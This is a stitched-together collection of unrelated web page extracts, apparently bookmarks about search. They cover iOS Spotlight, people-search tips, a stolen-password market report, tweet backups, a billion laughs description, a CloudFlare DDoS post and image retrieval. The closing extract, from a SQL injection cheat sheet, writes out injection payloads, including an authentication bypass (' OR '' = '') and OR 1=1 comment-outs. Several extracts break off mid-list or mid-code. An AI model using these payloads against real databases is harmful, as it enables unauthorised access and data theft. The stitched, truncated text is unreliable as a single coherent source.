Topsy - Real-time search for the social web With iOS 9, Search lets you look for content from the web, your contacts, apps, nearby places, and more. Powered by Siri, Search offers suggestions and updates results as you type. There are two ways to use Search on your iOS device. Quick Search Drag down from the middle of the Home screen and type what you're looking for. Siri Suggestions Drag right from the Home screen to show Search and get Siri Suggestions. Get Siri Suggestions Siri Suggestions include apps and contacts that you might be interested in. You can use Siri Suggestions with iPhone 5 and later, iPad Pro, iPad (4th generation) and later, iPad mini (2nd generation) and later, and iPod touch (6th generation). Change search settings Go to Settings > General > Spotlight Search. From here, you can turn Siri Suggestions on or off and choose which apps to include in your searches. If you don’t want Siri or Spotlight to suggest nearby locations, go to Settings > Privacy > Location Services. Last Modified:
Search Lately, there has been a lot of discussion about the future of our information consumption. Are we going to be using search in a different way or using niche search engines? Are we going to get recommendations from from our social network? AJ Kohn has an excellent example of what Facebook could do. What if Facebook added a simple More Like This link to certain news feed items? The benefit of context within your social network stream could also aid this process. GigaOm thinks that recommendation is still the holy grail for news: What the media industry really needs is some way to filter all of that information in useful ways, and recommend things you might not have read yet…social networks like Twitter and Facebook have proven to be the best way of getting recommended content. In this little quote, they actually mention three different ideas. You will notice that I have mentioned “context” several times. So, is there a holy grail? How does search fit into all of this?
White Pages | Phone Number Lookup & People Search - AnyWho Personal identifying information available on AnyWho is not provided by AT&T and is provided solely by an unaffiliated third party, Intelius, Inc. Full Disclaimer Search Tips Enter a partial first name or leave the first name blank to expand your search For first name, try more formal variations (e.g., James rather than Jim or Jimmy) or vice versa If the last name is common, include the full first name and middle initial or city/state to narrow your results If the last name is hyphenated (e.g., Covey-Jones), try using one of the names, without the hyphen Make sure city name is spelled correctly or that the ZIP code is correct Try searching by name and state if you are unable to find a match Try searching by street name if you are not able to find the exact address Since street names can be abbreviated, try searching by house number, city and state to get broader results Try entering the entire city name (e.g., Mount Vernon rather than Mt. Find People in Our White Pages Directory
Exploring the Market for Stolen Passwords Not long ago, PCs compromised by malware were put to a limited number of fraudulent uses, including spam, click fraud and denial-of-service attacks. These days, computer crooks are extracting and selling a much broader array of data stolen from hacked systems, including passwords and associated email credentials tied to a variety of online retailers. This shop sells credentials to active accounts at dozens of leading e-retailers. At the forefront of this trend are the botnet creation kits like Citadel, ZeuS and SpyEye, which make it simple for miscreants to assemble collections of compromised machines. Some of the most valuable data extracted from hacked PCs is bank login information. Logins for everything from Amazon.com to Walmart.com often are resold — either in bulk, or separately by retailer name — on underground crime forums. The “Freshotools” service sells a variety of hacked e-retailer credentials.
Top 10 Websites to Back Up Your Tweets As a matter of fact, all your tweets will be stored on Twitter.com, but only those posted in about 10 days are available for search, and it is hard to track the old tweets, so that to back up your tweets will be useful, especially when you are going to review your old tweets. To back up your tweets, you can check out below 10 websites, all of which will let you do that for free. 1. Google Reader Just subscribe to your Twitter RSS Feed with your Google Reader, then you can back up your tweets automatically and you can also search them easily. Go to Google Reader 2. On Twapper Keeper, you can back up any Twitter user’s public tweets just by entering its username, you can sort the results by date or the number of tweets, and you can also download the result tweets. Besides your tweets, you can also back up the tweets with any hashtags or keywords. Go to Twapper Keeper 3. Go to Twistory 4. Just log in with Twitter OAuth, then you can download your tweets as CSV files. Go to Tweetake 5. 6. 7. 8. 9.
Improve Your Google Search Skills [Infographic] - How-To Geek - StumbleUpon Don’t limit yourself to just plugging in simple search terms to Google; check out this infographic and learn a search string search or two. You don’t need to limit yourself to searching just for simple strings; Google supports all manner of handy search tricks. If you want to search just HowToGeek.com’s archive of XBMC articles, for example, you can plug in site:howtogeek.com XBMC to search our site. Get More Out of Google [HackCollege via Mashable] Jason Fitzpatrick is a warranty-voiding DIYer who spends his days cracking opening cases and wrestling with code so you don't have to. Billion laughs In computer security, a billion laughs attack is a type of denial-of-service (DoS) attack which is aimed at parsers of XML documents. It is also referred to as an XML bomb or as an exponential entity expansion attack. Details While the original form of the attack was aimed specifically at XML parsers, the term may be applicable to similar subjects as well. The problem was first reported as early as 2003, but began to be widely addressed in 2008. Defenses against this kind of attack include capping the memory allocated in an individual parser if loss of the document is acceptable, or treating entities symbolically and expanding them lazily only when (and to the extent) their content is to be used. Code example <? When an XML parser loads this document, it sees that it includes one root element, "lolz", that contains the text "&lol9;". Variations The billion laughs attack described above takes an exponential amount of space. See also References
People Search - Free People Search Engines & People Finder. Find People Free, Locate People and Search People Free. Google A Person - Google People Finder & Google People Search. Person Search, Person Locator, Person Finder and People Searches Online. Welcome to Free Book Zone - Engineering, Technical, Medical, Maths, Physics eBooks
How to Launch a 65Gbps DDoS, and How to Stop One Yesterday I posted a post mortem on an outage we had Saturday. The outage was caused when we applied an overly aggressive rate limit to traffic on our network while battling a determined DDoS attacker. In the process of writing it I mentioned that we'd seen a 65Gbps DDoS earlier on Saturday. What Constitutes a Big DDoS? A 65Gbps DDoS is a big attack, easily in the top 5% of the biggest attacks we see. At CloudFlare, an attack needs to get over about 5Gbps to set off alarms with our ops team. So You Want to Launch a DDoS So how does an attacker generate 65Gbps of traffic? Botnet herders will often rent out access to their botnets, often billing in 15 minute increments (just like lawyers). To launch a 65Gbps attack, you'd need a botnet with at least 65,000 compromised machines each capable of sending 1Mbps of upstream data. Amplifying the Attacks Since renting a large botnet can be expensive and unwieldy, attackers typically look for additional ways to amplify the size of their attacks.
Image retrieval The first microcomputer-based image database retrieval system was developed at MIT, in the 1990s, by Banireddy Prasaad, Amar Gupta, Hoo-min Toong, and Stuart Madnick. A 2008 survey article documented progresses after 2007. Search methods Image search is a specialized data search used to find images. To search for images, a user may provide query terms such as keyword, image file/link, or click on some image, and the system will return images "similar" to the query. The similarity used for search criteria could be meta tags, color distribution in images, region/shape attributes, etc. Image meta search - search of images based on associated metadata such as keywords, text, etc.Content-based image retrieval (CBIR) – the application of computer vision to the image retrieval. Data Scope It is crucial to understand the scope and nature of image data in order to determine the complexity of image search system design. Evaluations See also References
Find search engines from across the world with Search Engine Colossus SQL Injection Knowledge Base Default Databases Testing Injection False means the query is invalid (MySQL errors/missing content on website) True means the query is valid (content is displayed as usual) Given the query SELECT * FROM Table WHERE id = '1'; Examples: SELECT * FROM Articles WHERE id = '1'''; SELECT 1 FROM dual WHERE 1 = '1'''''''''''''UNION SELECT '2'; Notes: You can use as many apostrophes and quotations as you want as long as they pair up. Given the query SELECT * FROM Table WHERE id = 1; Example: SELECT * FROM Users WHERE id = 3-2; true is equal to 1. Given the query SELECT * FROM Table WHERE username = ''; Example: SELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = ''; The following can be used to comment out the rest of the query after your injection: Examples: SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password = ''; SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`'; Note: The backtick can only be used to end a query when used as an alias. Testing Version /*!